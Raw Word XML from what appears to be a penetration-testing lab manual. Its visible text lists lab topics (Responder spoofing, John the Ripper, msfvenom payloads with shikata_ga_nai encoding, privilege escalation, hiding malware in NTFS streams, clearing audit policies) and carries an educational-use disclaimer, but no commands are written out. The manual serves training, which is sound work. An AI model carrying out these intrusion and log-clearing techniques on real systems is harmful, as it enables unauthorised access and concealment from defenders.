                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>What we do?</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 182" o:spid="_x0000_s1141" style="position:absolute;left:9586;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bU/MMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywjemo0eSkyzitQWc2yNkHobsmMS&#10;mp0N2a2J/fXdQsHbPN7nZNvJdOJKg2stK1hGMQjiyuqWawWn4u0xAeE8ssbOMim4kYPtZvaQYart&#10;yB90PfpahBB2KSpovO9TKV3VkEEX2Z44cBc7GPQBDrXUA44h3HRyFcdP0mDLoaHBnl4aqr6O30bB&#10;Iel3n7n9Gevu9Xwo38v1vlh7pRbzafcMwtPk7+J/d67D/GQFf8+EC+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bU/MMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LLMNR/ NBT-NS Spoofing attack </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="193" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="193" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-15" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="193" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MSFVENOM to create a Payload and gain Remote Desktop </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="2170" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(VNC) access </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="45" w:line="336" w:lineRule="auto"/>
        <w:ind w:right="193" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create Payload using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Escalate Privilege 3. Hide Malicious Apps using NTFS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Filestream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Win </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2016) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1075" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4. Set and Clear Audit Policies (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Auditpol</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="44" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5768340" cy="218237"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="8842" name="Group 8842"/>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1584" name="Shape 11584"/>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224" name="Rectangle 224"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="18288" y="0"/>
                            <a:ext cx="1027478" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Disclaimer</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="225" name="Rectangle 225"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="789432" y="0"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="Group 8842" o:spid="_x0000_s1142"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I4rRQMAAMkJAAAOAAAAZHJzL2Uyb0RvYy54bWzEVttu2zAMfR+wfxD8vvqSm2skKYZ2LQYM&#10;a9F2H6Ao8gWQJUNS4mRfP4q2nLTZuq0DugSwaYkX8ZA89vxiVwuy5dpUSi6C+CwKCJdMrStZLIJv&#10;j9cf0oAYS+WaCiX5IthzE1ws37+bt03GE1UqseaagBNpsrZZBKW1TRaGhpW8puZMNVzCZq50TS08&#10;6iJca9qC91qESRRNw1bpdaMV48bA6lW3GSzRf55zZm/z3HBLxCKAs1m8aryu3DVczmlWaNqUFeuP&#10;QV9xippWEoIOrq6opWSjqxNXdcW0Miq3Z0zVocrzinHMAbKJo2fZ3Gi1aTCXImuLZoAJoH2G06vd&#10;sq/bO02q9SJI03ESEElrqBIGJrgCALVNkYHejW4emjvdLxTdk8t5l+va3SEbskNo9wO0fGcJg8XJ&#10;bJqOxlABBntJnCajWYc9K6FAJ2as/PSyYejDhu50w2HaBtrIHJAy/4bUQ0kbjgUwDoEeqTiepGMP&#10;FaqQbgmhQc0BKJMZwOyXKMXnSTTqgPgpUvFskkyxS4eEacY2xt5whZjT7RdjuyZee4mWXmI76UUN&#10;o/DiEDTUOjt3VCeS9qhoJYx2dxK3Xastf1SoaJ9VDk552BXyWGvoAN8coOs1/L1Bf8eaTwDwav7e&#10;qUNTgcs/VvRodk7gEC7b5bwXEAGQjzEW0oHhepcCQ+WCWhz1urJAXaKqIXgyi6KDY/DmGrGrPEp2&#10;L7gDTMh7nsO44Zi4BaOL1aXQZEsdQeHPtQNiA6pOJa+EGKxiDP3E6jpx/96qV3Z2HOlvsIw6S9YH&#10;7DgQmATy8kwIUQcjjKykHewl8DcGOUrIiSu13iMrYM4wfI4w3mAKk2SYwXvobSoLwYlb/JspBCJK&#10;4Q3lWxLy72knjpLZeAZbyFfnUTKZ9Ah7tmt0N4XECYvAzRci7CfSNVSv4rAU0l2luoZq+gKf9Ind&#10;rXZIxkns0+jgJaXS32/hPZsLBb0IA4hSQMRnCRwHNbRe0F5YeUFbcanw/dcd4ePGqrxyrIEl6yL0&#10;D29Zv4nn0OP6IcyugYBvf8+is/R8PILX1mkBJ9NRDA3yn8qH43iYjrctH74S4XsBaaT/tnEfJMfP&#10;WO7DF9jyBwAAAP//AwBQSwMEFAAGAAgAAAAhAAPdXPLdAAAABAEAAA8AAABkcnMvZG93bnJldi54&#10;bWxMj0FrwkAQhe8F/8Myhd7qJpqKTbMRkbYnKaiF0tuYHZNgdjZk1yT++257qZeBx3u89022Gk0j&#10;eupcbVlBPI1AEBdW11wq+Dy8PS5BOI+ssbFMCq7kYJVP7jJMtR14R/3elyKUsEtRQeV9m0rpiooM&#10;uqltiYN3sp1BH2RXSt3hEMpNI2dRtJAGaw4LFba0qag47y9GwfuAw3oev/bb82lz/T48fXxtY1Lq&#10;4X5cv4DwNPr/MPziB3TIA9PRXlg70SgIj/i/G7znaJmAOCqYJwnIPJO38PkPAAAA//8DAFBLAQIt&#10;ABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10u&#10;eG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5y&#10;ZWxzUEsBAi0AFAAGAAgAAAAhAPPIjitFAwAAyQkAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9E&#10;b2MueG1sUEsBAi0AFAAGAAgAAAAhAAPdXPLdAAAABAEAAA8AAAAAAAAAAAAAAAAAnwUAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACpBgAAAAA=&#10;">
                <v:shape id="Shape 11584" o:spid="_x0000_s1143" style="position:absolute;top:192;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In08QA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2sCMRC+F/ofwgi91axSRbZGkUpRvPkAPQ7JdHfZ&#10;zWRJ4rrtr28Ewdt8fM+ZL3vbiI58qBwrGA0zEMTamYoLBafj9/sMRIjIBhvHpOCXAiwXry9zzI27&#10;8Z66QyxECuGQo4IyxjaXMuiSLIaha4kT9+O8xZigL6TxeEvhtpHjLJtKixWnhhJb+ipJ14erVaDP&#10;nd/pa735O8XL5rLfHmst10q9DfrVJ4hIfXyKH+6tSfNHk9kH3N9JN8jF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6SJ9PEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l5768340,r,175260l,175260,,e" fillcolor="#f2f2f2" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5768340,175260"/>
                </v:shape>
                <v:rect id="Rectangle 224" o:spid="_x0000_s1144" style="position:absolute;left:182;width:10275;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DXVcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvGlqWUSrUWTXRY/+WVBvj+bZ&#10;FpuX0kRb/fRGEPY4zMxvmOm8NaW4Ue0KywoG/QgEcWp1wZmCv/1vbwTCeWSNpWVScCcH89lHZ4qJ&#10;tg1v6bbzmQgQdgkqyL2vEildmpNB17cVcfDOtjbog6wzqWtsAtyUMo6ioTRYcFjIsaLvnNLL7moU&#10;rEbV4ri2jyYrl6fVYXMY/+zHXqnuZ7uYgPDU+v/wu73WCuL4C1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kNdVxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Disclaimer</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 225" o:spid="_x0000_s1145" style="position:absolute;left:7894;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xyzsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE78J+h/AWvGlqYUWrUWTXRY/+WVBvj+bZ&#10;FpuX0kRb/fRGEPY4zMxvmOm8NaW4Ue0KywoG/QgEcWp1wZmCv/1vbwTCeWSNpWVScCcH89lHZ4qJ&#10;tg1v6bbzmQgQdgkqyL2vEildmpNB17cVcfDOtjbog6wzqWtsAtyUMo6ioTRYcFjIsaLvnNLL7moU&#10;rEbV4ri2jyYrl6fVYXMY/+zHXqnuZ7uYgPDU+v/wu73WCuL4C1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3HLOxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="358" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Do not try these in unsupervised environments/ real time environments. Attempting to use certain tools is real time environments or without proper written consents from the owners of the network is punishable offense. All our labs are only for educational purposes and to be practiced under supervised environments.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="10" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="36" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="2471293" cy="251454"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="8843" name="Group 8843"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2471293" cy="251454"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2471293" cy="251454"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="11585" name="Shape 11585"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="47848"/>
                            <a:ext cx="1469136" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1469136" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1469136" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1469136"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237" name="Rectangle 237"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="18288" y="28646"/>
                            <a:ext cx="962007" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Takeaway</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="238" name="Rectangle 238"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="739140" y="28646"/>
                            <a:ext cx="56314" cy="290255"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00112181" w:rsidRDefault="00112181">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                                  <w:b/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> </w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8946" name="Picture 8946"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1564513" y="-411"/>
                            <a:ext cx="263525" cy="247650"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8947" name="Picture 8947"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId20"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1869313" y="-411"/>
                            <a:ext cx="263525" cy="247650"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8948" name="Picture 8948"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId21"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2209038" y="-411"/>
                            <a:ext cx="263525" cy="247650"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group id="Group 8843" o:spid="_x0000_s1146" style="width:194.6pt;height:19.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="24712,25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xmhIVQQAAFQQAAAOAAAAZHJzL2Uyb0RvYy54bWzsWG1v4zYM/j5g/8Hw&#10;9za2YztO0OQwXNfigGFX3N1+gKLIsTFZMiTlpfv1IynLSdt77YbeNqxFbVqmSOoR+Yju1atjJ6O9&#10;MLbVahmnl0kcCcX1plXbZfzbh5uLKo6sY2rDpFZiGd8LG79a/fjD1aFfiEw3Wm6EicCIsotDv4wb&#10;5/rFZGJ5IzpmL3UvFLystemYg0eznWwMO4D1Tk6yJCknB202vdFcWAuj1/5lvCL7dS24e1vXVrhI&#10;LmOIzdHV0HWN18nqii22hvVNy4cw2DOi6FirwOlo6po5Fu1M+8RU13Kjra7dJdfdRNd1ywWtAVaT&#10;Jo9Wc2v0rqe1bBeHbT/CBNA+wunZZvmv+zsTtZtlXFX5NI4U62CXyHFEIwDQod8uQO/W9O/7OzMM&#10;bP0TrvlYmw7vsJroSNDej9CKo4s4DGb5LM3m4IDDu6xI8yL32PMGNujJNN78/PmJk+B2gtGNwRx6&#10;SCN7Qsr+NaTeN6wXtAEWERiQStOiKgJUpBL5IYKGNEeg7MICZp9EKZ9VeeWBCEileTlPp6VHKp0V&#10;WUlZOi6YLfjOuluhCXO2/8U6n8SbILEmSPyogmigFD5bBD1zOA9DRTE6QDmHUBqQfST4utN78UGT&#10;onu0cxDl6a1U51qjsZAcoBs0wr0ne+eaDwAIauHu1aGsweRXKwY0vREIAle7uhoEQgDkc4ylQjDA&#10;DWfAULVkjkq9ax1Ql2w7cJ7NkuRkGKxhIvqdJ8ndS4GASfVO1FBuVCY4YM12/VqaaM+QoOgH04Gw&#10;AVVUqVspx1kpuX4w6ybD32HWoIzzBNHfODPxM/ng0HMgMAmsKzAheB0nkWet3DhfAX+Tk7MFobjW&#10;m3tiBVozFB8SxgtUYTadhRp8B7nN1FaKCAe/pQrTKqvghEJOqsq8xLmAwUA98xJOGHBClDVPsqIY&#10;QA6E1xtfiBEKyxhLjEAORYk5NaigXanwqvQNbGjY4yep4o7rI/FxNg0r8QhHjTZ/vIWjtpYa0hFq&#10;kKQ4km8U0BwebkEwQVgHwTj5WtMR6EP4aed03SJx0K55D8PDS24hYO9PnPMtJELEHALK/TKRzqbz&#10;NPcc8JE9LMppmn+3LaQz7lQkL7uFfcsX8Dd0DSA9OQu/3F3BLLczIh6MdF9lo2Pm911/AQ0OUGu7&#10;bmXr7qlZg+LAoNT+ruV4KOLD6Vit5lCAQzqAAvqNaAyyNGjiPExafH5gZi3bHusK0xvlIWBguUed&#10;0kfW7Luwa813nVDOt5VGAM1DT2ubtrdxZBaiWwvoksybTepZwjojHIeTIzA0p3ICSg8vKMpTYBjz&#10;J5qBtCjzIoXuCIjoIk8HD4GHsnJaZNBwEA/ls7IIJ82zeIii8nGQCGF5fEH4N+XKyP53p1wh8kec&#10;Mav+q7lSlfPp/7nyTbwyHjNnuUKnzD8pV6iFO6OPv4FXsiyZJ1Pf4HwXXqGvM/h0Bcp+8G18/kxt&#10;x+mfAas/AQ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wQUAAYACAAAACEANmA+Y9wA&